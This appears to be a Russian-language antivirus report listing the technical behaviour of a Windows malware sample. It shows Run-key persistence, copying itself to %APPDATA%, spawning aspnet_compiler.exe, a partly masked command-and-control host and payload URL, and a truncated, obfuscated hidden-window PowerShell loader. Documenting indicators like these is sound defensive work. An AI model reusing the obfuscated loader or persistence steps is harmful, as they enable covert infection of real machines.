Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\<Имя файла>.exe'
- %WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe
- %APPDATA%\<Имя файла>.exe
- 'Ho####IP.ooguy.com':1204
- http://www.as####kasounds.com/upfiles/up_down/64aa97c8c5fc458947b83fe536eaecfd.mp3
- DNS ASK google.com
- DNS ASK as####kasounds.com
- DNS ASK Ho####IP.ooguy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$PQcbYECUwgKyql=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c COPY <Полный путь к файлу> %APPDATA%
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$PQcbYECUwgKyql=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_compiler.exe'